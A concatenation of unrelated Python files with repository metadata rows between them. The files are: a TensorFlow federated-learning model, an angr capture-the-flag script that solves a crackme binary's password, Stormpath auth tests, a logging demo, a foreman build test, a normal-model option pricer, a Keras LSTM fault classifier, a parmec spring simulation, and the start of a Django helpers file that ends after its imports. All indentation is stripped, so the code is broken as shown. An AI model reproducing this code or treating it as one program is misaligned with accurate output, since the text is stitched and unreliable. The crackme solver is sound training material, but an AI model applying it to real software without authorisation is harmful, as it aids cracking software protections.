# create computation graph
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(123 + seed)
_created = self.create_model(optimizer)
self.features = _created[0]
self.labels = _created[1]
self.train_op = _created[2]
self.grads = _created[3]
self.eval_metric_ops = _created[4]
self.loss = _created[5]
self.saver = tf.train.Saver()
# set the gpu resources
gpu_options = tf.compat.v1.GPUOptions(visible_device_list="{}".format(gpu_id), allow_growth=True)
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
self.sess = tf.Session(graph=self.graph, config=config)
# self.sess = tf.Session(graph=self.graph)
# REVIEW: find memory footprint and compute cost of the model
self.size = graph_size(self.graph)
with self.graph.as_default():
self.sess.run(tf.global_variables_initializer())
metadata = tf.RunMetadata()
opts = tf.profiler.ProfileOptionBuilder.float_operation()
self.flops = tf.profiler.profile(self.graph, run_meta=metadata, cmd='scope', options=opts).total_float_ops
def create_model(self, optimizer):
""" Model function for Logistic Regression.
Args:
optimizer: tf.train.Optimizer
Returns:
tuple: (features, labels, train_op, grads, eval_metric_ops, loss)
"""
features = tf.placeholder(tf.float32, shape=[None, 784], name='features')
labels = tf.placeholder(tf.int64, shape=[None, ], name='labels')
logits = tf.layers.dense(inputs=features,
units=self.num_classes,
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.001))
predictions = {
"classes": tf.argmax(input=logits, axis=1),
"probabilities": tf.nn.softmax(logits, name="softmax_tensor")
}
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
grads_and_vars = optimizer.compute_gradients(loss)
grads, _ = zip(*grads_and_vars)
train_op = optimizer.apply_gradients(grads_and_vars, global_step=tf.train.get_global_step())
eval_metric_ops = tf.count_nonzero(tf.equal(labels, predictions["classes"]))
return features, labels, train_op, grads, eval_metric_ops, loss
def set_params(self, latest_params=None, momentum=False, gamma=0.9):
""" Set parameters from server
Args:
latest_params: list
list of tf.Variables
momentum: boolean
gamma: float
TODO: update variable with its local variable and the value from
latest_params
TODO: DO NOT set_params from the global, instead, use the global gradient to update
"""
if latest_params is not None:
with self.graph.as_default():
# previous gradient
all_vars = tf.trainable_variables()
for variable, value in zip(all_vars, latest_params):
if momentum:
curr_val = self.sess.run(variable)
new_val = gamma * curr_val + (1 - gamma) * value
# TODO: use `assign` function instead of `load`
variable.load(new_val, self.sess)
else:
variable.load(value, self.sess)
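The momentum branch above is a plain exponential blend of the local value with the incoming server value; a minimal standalone sketch of that blend (the numbers are illustrative, not from the model):

```python
gamma = 0.9
curr_val = 2.0   # value currently held by the learner
incoming = 1.0   # value received from the server
# keep 90% of the local value, move 10% toward the incoming one
new_val = gamma * curr_val + (1 - gamma) * incoming
```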
def get_params(self):
""" Get model parameters.
Returns:
model_params: list
list of tf.Variables
"""
with self.graph.as_default():
model_params = self.sess.run(tf.trainable_variables())
return model_params
def get_gradients(self, data, model_len):
""" Access gradients of a given dataset.
Args:
data: dict
model_len: int
Returns:
num_samples: int
grads: tuple
"""
grads = np.zeros(model_len)
num_samples = len(data['y'])
with self.graph.as_default():
model_grads = self.sess.run(self.grads, feed_dict={self.features: data['x'],
self.labels: data['y']})
grads = process_grad(model_grads)
return num_samples, grads
def solve_inner(self, data, num_epochs=1, batch_size=32):
'''Solves local optimization problem.
Args:
data: dict with format {'x':[], 'y':[]}
num_epochs: int
batch_size: int
Returns:
soln: list
comp: float
'''
for _ in trange(num_epochs, desc='Epoch: ', leave=False, ncols=120):
for X, y in batch_data(data, batch_size):
with self.graph.as_default():
self.sess.run(self.train_op, feed_dict={self.features: X, self.labels: y})
soln = self.get_params()
comp = num_epochs * (len(data['y']) // batch_size) * batch_size * self.flops
return soln, comp
def test(self, data):
'''
Args:
data: dict of the form {'x': [], 'y': []}
Returns:
tot_correct: int
loss: float
'''
with self.graph.as_default():
tot_correct, loss = self.sess.run([self.eval_metric_ops, self.loss],
feed_dict={self.features: data['x'], self.labels: data['y']})
return tot_correct, loss
def close(self):
self.sess.close()
| 35.920904 | 118 | 0.574394 | 748 | 6,358 | 4.707219 | 0.286096 | 0.030673 | 0.025845 | 0.029821 | 0.152798 | 0.140301 | 0.083499 | 0.06589 | 0.047146 | 0.022721 | 0 | 0.009564 | 0.325731 | 6,358 | 176 | 119 | 36.125 | 0.811756 | 0.219723 | 0 | 0.084337 | 0 | 0 | 0.016567 | 0 | 0 | 0 | 0 | 0.017045 | 0 | 1 | 0.096386 | false | 0 | 0.072289 | 0 | 0.240964 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a183e429ab2df0bcb4079f035e2dd6d3cb6737a5 | 3,402 | py | Python | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | angr_ctf/solutions/06_angr_symbolic_dynamic_memory.py | Hamz-a/angr_playground | 8216f43bd2ec9a91c796a56bab610b119f8311cf | [
"MIT"
] | null | null | null | import angr
import claripy
path_to_bin = "../binaries/06_angr_symbolic_dynamic_memory"
# Find callback
def good_job(state):
# Get the output of the state
stdout = state.posix.dumps(1)
# If the program echo'ed "Good Job." then we've found a good state
return "Good Job." in str(stdout)
# Avoid callback
def try_again(state):
# Get the output of the state
stdout = state.posix.dumps(1)
# If the program echo'ed "Try again." then we found a state that we want to avoid
return "Try again." in str(stdout)
# Create an angr project
project = angr.Project(path_to_bin)
# Create the begin state starting from address 0x08048699 (see r2 output below)
# $ r2 -A 06_angr_symbolic_dynamic_memory
# [0x08048490]> pdf @main
# ┌ (fcn) main 395
# │ main (int argc, char **argv, char **envp);
# │ <REDACTED>
# │ 0x08048664 e8e7fdffff call sym.imp.memset ; void *memset(void *s, int c, size_t n)
# │ 0x08048669 83c410 add esp, 0x10
# │ 0x0804866c 83ec0c sub esp, 0xc
# │ 0x0804866f 682e880408 push str.Enter_the_password: ; 0x804882e ; "Enter the password: " ; const char *format
# │ 0x08048674 e877fdffff call sym.imp.printf ; int printf(const char *format)
# │ 0x08048679 83c410 add esp, 0x10
# │ 0x0804867c 8b15acc8bc0a mov edx, dword [obj.buffer1] ; [0xabcc8ac:4]=0
# │ 0x08048682 a1a4c8bc0a mov eax, dword [obj.buffer0] ; [0xabcc8a4:4]=0
# │ 0x08048687 83ec04 sub esp, 4
# │ 0x0804868a 52 push edx
# │ 0x0804868b 50 push eax
# │ 0x0804868c 6843880408 push str.8s__8s ; 0x8048843 ; "%8s %8s" ; const char *format
# │ 0x08048691 e8cafdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)
# │ 0x08048696 83c410 add esp, 0x10
# │ 0x08048699 c745f4000000. mov dword [local_ch], 0 ; <<< START HERE
# │ ┌─< 0x080486a0 eb64 jmp 0x8048706
entry_state = project.factory.blank_state(addr=0x08048699)
# Create a Symbolic BitVectors for each part of the password (64 bits per part %8s is used in scanf)
password_part0 = claripy.BVS("password_part0", 64)
password_part1 = claripy.BVS("password_part1", 64)
# Setup some heap space
entry_state.memory.store(0xabcc8a4, 0x4000000, endness=project.arch.memory_endness)
entry_state.memory.store(0xabcc8ac, 0x4000A00, endness=project.arch.memory_endness)
# Use the created heap and inject BVS
entry_state.memory.store(0x4000000, password_part0)
entry_state.memory.store(0x4000A00, password_part1)
# Create a simulation manager
simulation_manager = project.factory.simulation_manager(entry_state)
# Pass callbacks for states that we should find and avoid
simulation_manager.explore(avoid=try_again, find=good_job)
# If simulation manager has found a state
if simulation_manager.found:
found_state = simulation_manager.found[0]
# Get flag by solving the symbolic values using the found path
solution0 = found_state.solver.eval(password_part0, cast_to=bytes)
solution1 = found_state.solver.eval(password_part1, cast_to=bytes)
print("{} {}".format(solution0.decode("utf-8"), solution1.decode("utf-8")))
else:
print("No path found...") | 44.763158 | 131 | 0.663727 | 465 | 3,402 | 4.789247 | 0.415054 | 0.053435 | 0.026942 | 0.028738 | 0.160305 | 0.060171 | 0.060171 | 0.060171 | 0.060171 | 0.060171 | 0 | 0.138683 | 0.245444 | 3,402 | 76 | 132 | 44.763158 | 0.720686 | 0.614638 | 0 | 0.076923 | 0 | 0 | 0.094902 | 0.033725 | 0 | 0 | 0.050196 | 0 | 0 | 1 | 0.076923 | false | 0.230769 | 0.076923 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a18aeadaf1c0a497b57a81c26b42e7ee05084e81 | 1,543 | py | Python | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | tests/live/test_client_auth.py | denibertovic/stormpath-sdk-python | e594a1bb48de3fa8eff26558bf4f72bb056e9d00 | [
"Apache-2.0"
] | null | null | null | """Live tests of client authentication against the Stormpath service API."""
from os import environ
from stormpath.client import Client
from stormpath.error import Error
from .base import LiveBase
class TestAuth(LiveBase):
def test_basic_authentication_succeeds(self):
client = Client(
id=self.api_key_id,
secret=self.api_key_secret,
scheme='basic')
# force the SDK to make a call to the server
list(client.applications)
def test_basic_authentication_fails(self):
client = Client(
id=self.api_key_id + 'x',
secret=self.api_key_secret + 'x',
scheme='basic')
# force the SDK to make a call to the server
with self.assertRaises(Error):
list(client.applications)
def test_digest_authentication_succeeds(self):
client = Client(
id=self.api_key_id,
secret=self.api_key_secret,
scheme='SAuthc1')
# force the SDK to make a call to the server
client.applications
def test_digest_authentication_fails(self):
client = Client(
id=self.api_key_id + 'x',
secret=self.api_key_secret + 'x',
scheme='SAuthc1')
# force the SDK to make a call to the server
with self.assertRaises(Error):
list(client.applications)
def test_load_from_environment_variables(self):
client = Client()
for app in client.applications:
self.assertTrue(app.href)
| 29.113208 | 76 | 0.628645 | 192 | 1,543 | 4.885417 | 0.265625 | 0.059701 | 0.085288 | 0.076759 | 0.690832 | 0.659915 | 0.620469 | 0.620469 | 0.620469 | 0.620469 | 0 | 0.001837 | 0.294232 | 1,543 | 52 | 77 | 29.673077 | 0.859504 | 0.157485 | 0 | 0.6 | 0 | 0 | 0.021689 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 1 | 0.142857 | false | 0 | 0.114286 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a18bdd3e3f40a3f576715555ebb6a8270c24a370 | 256 | py | Python | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 136 | 2015-03-06T18:11:21.000Z | 2022-03-10T22:31:40.000Z | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 27 | 2015-01-07T01:38:03.000Z | 2021-12-22T19:20:15.000Z | languages/python/software_engineering_logging4.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1,582 | 2015-01-01T20:37:06.000Z | 2022-03-30T12:29:24.000Z | import logging
logger1 = logging.getLogger('package1.module1')
logger2 = logging.getLogger('package1.module2')
logging.basicConfig(level=logging.WARNING)
logger1.warning('This is a warning message')
logger2.warning('This is another warning message')
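Worth noting: dotted logger names form a hierarchy, and a child logger with no level of its own inherits the effective level configured on its ancestors (here, the root logger via `basicConfig`). A small sketch:

```python
import logging

logging.basicConfig(level=logging.WARNING)
parent = logging.getLogger('package1')
child = logging.getLogger('package1.module1')
# the child has no level of its own, so it falls back to its ancestors
effective = child.getEffectiveLevel()
```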
| 23.272727 | 52 | 0.792969 | 32 | 256 | 6.34375 | 0.5 | 0.157635 | 0.236453 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.09375 | 256 | 10 | 53 | 25.6 | 0.840517 | 0 | 0 | 0 | 0 | 0 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a18c81f3ba8e0a19564872357a93750676c04e10 | 862 | py | Python | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | 3 | 2016-01-04T06:28:52.000Z | 2020-09-20T13:18:40.000Z | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | null | null | null | py/foreman/tests/testdata/test_command/pkg1/build.py | clchiou/garage | 446ff34f86cdbd114b09b643da44988cf5d027a3 | [
"MIT"
] | null | null | null | from pathlib import Path
from foreman import define_parameter, rule, get_relpath
import foreman
if __name__ != 'pkg1':
raise AssertionError(__name__)
if not __file__.endswith('foreman/tests/testdata/test_command/pkg1/build.py'):
raise AssertionError(__file__)
relpath = get_relpath()
if relpath != Path('pkg1'):
raise AssertionError(relpath)
define_parameter('par1').with_derive(lambda ps: get_relpath())
@rule
@rule.depend('//pkg1/pkg2:rule2')
def rule1(parameters):
relpath = get_relpath()
if relpath != Path('pkg1'):
raise AssertionError(relpath)
par1 = parameters['par1']
if par1 != Path('pkg1'):
raise AssertionError(par1)
par2 = parameters['//pkg1/pkg2:par2']
if par2 != Path('pkg1/pkg2'):
raise AssertionError(par2)
# test_build() will check this
foreman._test_ran = True
| 21.02439 | 78 | 0.691415 | 105 | 862 | 5.419048 | 0.390476 | 0.200351 | 0.161687 | 0.142355 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0.210896 | 0 | 0.031206 | 0.182135 | 862 | 40 | 79 | 21.55 | 0.775887 | 0.032483 | 0 | 0.25 | 0 | 0 | 0.138221 | 0.058894 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a190762c1566ca65105a3350c21b6933040e5549 | 2,362 | py | Python | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | 14 | 2017-02-16T15:13:53.000Z | 2021-05-26T11:34:09.000Z | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | null | null | null | scripts/option_normal_model.py | jcoffi/FuturesAndOptionsTradingSimulation | e02fdbe8c40021785a2a1dae56ff4b72f2d47c30 | [
"MIT"
] | 10 | 2016-08-05T07:37:07.000Z | 2021-11-26T17:31:48.000Z | #IMPORT log and sqrt FROM math MODULE
from math import log, sqrt, exp, pi
#IMPORT date AND timedelta FOR HANDLING EXPIRY TIMES
from datetime import date, timedelta
#IMPORT SciPy stats MODULE
from scipy import stats
def asian_vol_factor(valDate,startDate,endDate):
    #VALIDATE START DATE RELATIVE TO END DATE AND RETURN NO IMPACT IF ODD
    if startDate > endDate: return 1
    # timedelta.days is an attribute, not a method
    T = (endDate - valDate).days
    L = (endDate - startDate).days
    if T > L:
        return sqrt(((T - L + 1) * L ** 2 + L * (L - 1) * (2 * L - 1) / 6) / (L ** 2 * T))
    else:
        return sqrt((T + 1) * (2*T + 1) / (6 * L ** 2))
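A standalone numeric check of the averaging-window factor for the case where the whole window lies ahead (`T > L`); stdlib only, and the dates are invented:

```python
from datetime import date
from math import sqrt

def asian_factor(val_date, start_date, end_date):
    # vol scaling while the Asian averaging window is still in the future
    T = (end_date - val_date).days
    L = (end_date - start_date).days
    return sqrt(((T - L + 1) * L ** 2 + L * (L - 1) * (2 * L - 1) / 6.0) / (L ** 2 * float(T)))

# T = 30 days to expiry, L = 10-day averaging window
f = asian_factor(date(2024, 1, 1), date(2024, 1, 21), date(2024, 1, 31))
```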
def F(z):
return (1/sqrt(2*pi)) * exp(-(z ** 2) / 2)
def option_price_normal(forward,strike,vol,rate,tenor,sign):
if vol == 0:
return sign * (forward - strike)
#sign = +1 for calls and -1 for puts
d1 = (forward - strike) / (vol * sqrt(tenor))
sameTerm = (vol * sqrt(tenor) * exp(-1*d1*d1/2)) / sqrt(2*3.141592653589793)
return exp(-1 * rate * tenor) * (sign * (forward - strike) * stats.norm.cdf(sign * d1) + sameTerm)
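As a sanity check, the normal-model (Bachelier) price above can be reproduced with the standard library alone; `norm_cdf` built from `math.erf` stands in for `stats.norm.cdf`, and put-call parity `C - P = df * (F - K)` should hold to rounding error:

```python
from math import erf, exp, pi, sqrt

def norm_cdf(x):
    return 0.5 * (1.0 + erf(x / sqrt(2.0)))

def bachelier_price(forward, strike, vol, rate, tenor, sign):
    # sign = +1 for calls, -1 for puts
    if vol == 0:
        return sign * (forward - strike)
    d1 = (forward - strike) / (vol * sqrt(tenor))
    same_term = vol * sqrt(tenor) * exp(-d1 * d1 / 2.0) / sqrt(2.0 * pi)
    return exp(-rate * tenor) * (sign * (forward - strike) * norm_cdf(sign * d1) + same_term)

call = bachelier_price(100.0, 95.0, 10.0, 0.02, 1.0, +1)
put = bachelier_price(100.0, 95.0, 10.0, 0.02, 1.0, -1)
```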
def option_implied_vol_normal(forward,strike,price,rate,tenor,sign):
#print 'imp vol calc:',forward,strike,price,rate,tenor,sign
price_err_limit = price/10000
iteration_limit = 20
vmax = 1.0 #START SEARCH FOR UPPER VOL BOUND AT 100%
tprice = 0
    while option_price_normal(forward,strike,vmax,rate,tenor,sign) < price:
vmax += 1
if vmax > iteration_limit: return -1 #ERROR CONDITION
#print 'vmax',vmax
vmin = vmax - 1
vmid = (vmin + vmax)/2
    tprice = option_price_normal(forward,strike,vmid,rate,tenor,sign)
count = 1
while abs(tprice - price) > price_err_limit:
if tprice > price:
vmax = vmid
else:
vmin = vmid
vmid = (vmin + vmax)/2
count = count + 1
if count > iteration_limit:
print 'option_implied_vol: search iter limit reached'
print forward,strike,price,rate,tenor,sign
return vmid #EXIT CONDITION
tprice = option_price_normal(forward,strike,vmid,rate,tenor,sign)
#print 'imp_vol = ',vmid
return vmid
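The search above brackets the vol upward in unit steps and then bisects; the same idea as a generic stdlib helper (the quadratic target function is only for illustration — it stands in for any increasing price function):

```python
def bisect_for_input(f, target, lo=0.0, hi=1.0, tol=1e-10, cap=20.0):
    # widen the upper bracket first, assuming f is increasing
    while f(hi) < target:
        hi += 1.0
        if hi > cap:
            return None  # target unreachable within the cap
    # then halve the bracket until it is tighter than tol
    while hi - lo > tol:
        mid = 0.5 * (lo + hi)
        if f(mid) > target:
            hi = mid
        else:
            lo = mid
    return 0.5 * (lo + hi)

root = bisect_for_input(lambda v: v * v, 2.0)
```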
| 38.721311 | 104 | 0.640559 | 346 | 2,362 | 4.283237 | 0.260116 | 0.114035 | 0.096491 | 0.080972 | 0.267881 | 0.25641 | 0.138327 | 0.138327 | 0.138327 | 0.138327 | 0 | 0.035595 | 0.238781 | 2,362 | 60 | 105 | 39.366667 | 0.788654 | 0.161727 | 0 | 0.212766 | 0 | 0 | 0.022854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06383 | null | null | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1946a453629c94f8bc3d4a45b2c968101db6df0 | 1,546 | py | Python | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | CatFaultDetection/LSTM/Test_LSTM.py | jonlwowski012/UGV-Wheel-Slip-Detection-Using-LSTM-and-DNN | 2af5dcf4c3b043f065f75b612a4bbfc4aa2d11e8 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from keras.models import model_from_json
import matplotlib.pyplot as plt
import pandas as pd
import time
def shuffler(filename):
df = pd.read_csv(filename, header=0)
# return the pandas dataframe
return df.reindex(np.random.permutation(df.index))
num_classes = 4
# Read Dataset
data = pd.read_csv('../dataset/fault_dataset.csv')
data = shuffler('../dataset/fault_dataset.csv')
X = np.asarray(data[['posex','posey','orix','oriy','oriz','oriw']])
y_norm = np.asarray(data['labels'])
y = np.zeros((len(y_norm), num_classes))
y[np.arange(len(y_norm)), y_norm] = 1
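The two lines above build one-hot labels with integer fancy indexing; the same trick in isolation (class count and labels are made up):

```python
import numpy as np

labels = np.array([0, 2, 1, 3])
num_classes = 4
onehot = np.zeros((len(labels), num_classes))
# row i gets a single 1 in column labels[i]
onehot[np.arange(len(labels)), labels] = 1
```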
# Define Paths and Variables
model_dir = 'model'
#%% Load model and weights separately due to error in keras
model = model_from_json(open(model_dir+"/model_weights.json").read())
model.load_weights(model_dir+"/model_weights.h5")
#%% Predict Output
t0 = time.time()
output_org = model.predict(np.reshape(X, (X.shape[0], 1, X.shape[1])))
print "Time to predict all ", len(X), " samples: ", time.time()-t0
print "Average time to predict a sample: ", (time.time()-t0)/len(X)
output = np.zeros_like(output_org)
output[np.arange(len(output_org)), output_org.argmax(1)] = 1
correct = 0
for i in range(len(output)):
if np.array_equal(output[i],y[i]):
correct += 1
print "Acc: ", correct/float(len(output))
output_index = []
for row in output:
output_index.append(np.argmax(row))
plt.plot(y_norm, color='red',linewidth=3)
plt.plot(output_index, color='blue', linewidth=1)
plt.show()
| 28.109091 | 70 | 0.721863 | 257 | 1,546 | 4.225681 | 0.40856 | 0.02302 | 0.035912 | 0.040516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011704 | 0.115783 | 1,546 | 54 | 71 | 28.62963 | 0.782736 | 0.09185 | 0 | 0 | 0 | 0 | 0.146638 | 0.040057 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.189189 | null | null | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a194bf4b74105b49a6100082214a932f48fe4c3d | 3,304 | py | Python | examples/spring_system.py | tkoziara/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | null | null | null | examples/spring_system.py | tkoziara/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | 15 | 2017-06-09T12:05:27.000Z | 2018-10-25T13:59:58.000Z | examples/spring_system.py | parmes/parmec | fefe0586798cd65744334f9abeab183159bd3d7a | [
"MIT"
] | null | null | null | # find parmec path
import os, sys
def where(program):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, program)):
return path
return None
path = where('parmec4')
if path == None:
print 'ERROR: parmec4 not found in PATH!'
print ' Download and compile parmec;',
print 'add parmec directory to PATH variable;'
sys.exit(1)
print '(Found parmec4 at:', path + ')'
sys.path.append(os.path.join (path, 'python'))
from progress_bar import * # and import progress bar
from scipy import spatial # import scipy
import numpy as np # and numpy
# command line arguments
av = ARGV()
if '-h' in av or '--help' in av:
print 'Beam-like spring-system example:',
print 'cantilever beam fixed at x-far-end'
print 'Unit cubes interact via springs',
print 'connected within a radius of influence'
print 'Available arguments:'
print ' -nx int --> x resolution (or 10)'
print ' -ny int --> y resolution (or 5)'
print ' -nz int --> z resolution (or 5)'
print ' -du float --> duration (or 5.)'
print ' -st float --> time step (or auto)'
print ' -ra float --> spring influence radius (or 2.)'
print ' -h or --help --> print this help'
sys.exit(0)
# input parameters
nx = int(av[av.index('-nx')+1]) if '-nx' in av else 10
ny = int(av[av.index('-ny')+1]) if '-ny' in av else 5
nz = int(av[av.index('-nz')+1]) if '-nz' in av else 5
du = float(av[av.index('-du')+1]) if '-du' in av else 5.
st = float(av[av.index('-st')+1]) if '-st' in av else -1
ra = float(av[av.index('-ra')+1]) if '-ra' in av else 2.
# materials
matnum = MATERIAL (1E3, 1E9, 0.25)
spring = [-1,-1E6, 1,1E6]
dratio = 10.
# (nx,ny,nz) array of unit cubes
iend = nx*ny*nz-1
progress_bar(0, iend, 'Adding particles:')
x, y, z = np.mgrid[0:nx, 0:ny, 0:nz]
data = zip(x.ravel(), y.ravel(), z.ravel())
datarange = range (0, len(data))
for i in datarange:
p = data[i]
nodes = [p[0]-.5, p[1]-.5, p[2]-.5,
p[0]+.5, p[1]-.5, p[2]-.5,
p[0]+.5, p[1]+.5, p[2]-.5,
p[0]-.5, p[1]+.5, p[2]-.5,
p[0]-.5, p[1]-.5, p[2]+.5,
p[0]+.5, p[1]-.5, p[2]+.5,
p[0]+.5, p[1]+.5, p[2]+.5,
p[0]-.5, p[1]+.5, p[2]+.5]
elements = [8, 0, 1, 2, 3, 4, 5, 6, 7, matnum]
parnum = MESH (nodes, elements, matnum, 0)
progress_bar(i, iend, 'Adding particles:')
# connecting springs within radius
def add(a,b): return (a[0]+b[0],a[1]+b[1],a[2]+b[2])
def mul(a,b): return (a[0]*b,a[1]*b,a[2]*b)
progress_bar(0, iend, 'Adding springs:')
tree = spatial.KDTree(data)
for i in datarange:
p = data[i]
adj = tree.query_ball_point(np.array(p), ra)
for j in [k for k in adj if k < i]:
q = data[j]
x = mul(add(p,q),.5)
sprnum = SPRING (i, x, j, x, spring, dratio)
progress_bar(i, iend, 'Adding springs:')
# fixed at x-far-end
for i in datarange[-ny*nz:]:
RESTRAIN (i, [1,0,0,0,1,0,0,0,1], [1,0,0,0,1,0,0,0,1])
# gravity acceleration
GRAVITY (0., 0., -9.8)
# time step
hc = CRITICAL(perparticle=10)
if st < 0: st = 0.5 * hc[0][0]
# print out statistics
print '%dx%dx%d=%d particles and %d springs' % (nx,ny,nz,parnum,sprnum)
print '10 lowest-step per-particle tuples (critical step, particle index, circular frequency, damping ratio):'
print hc
print 'Running %d steps of size %g:' % (int(du/st),st)
# run simulation
DEM (du, st, (0.05, 0.01))
| 32.07767 | 110 | 0.608656 | 628 | 3,304 | 3.191083 | 0.269108 | 0.022954 | 0.011976 | 0.015968 | 0.138723 | 0.080838 | 0.06986 | 0.06986 | 0.04491 | 0.035928 | 0 | 0.056343 | 0.188862 | 3,304 | 102 | 111 | 32.392157 | 0.691418 | 0.0796 | 0 | 0.049383 | 0 | 0.012346 | 0.270654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.049383 | null | null | 0.246914 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a196cc5f96a8b93a3bb1cc5156a3a6b18c755ee7 | 9,491 | py | Python | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | 1 | 2022-03-12T23:44:21.000Z | 2022-03-12T23:44:21.000Z | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | null | null | null | apps/core/helpers.py | tarvitz/icu | 9a7cdac9d26ea224539f68f678b90bf70084374d | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
#
import re
import os
from django.conf import settings
from django.shortcuts import (
render_to_response, get_object_or_404 as _get_object_or_404,
redirect)
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.utils.translation import ugettext_lazy as _, ugettext as tr
from django.http import Http404
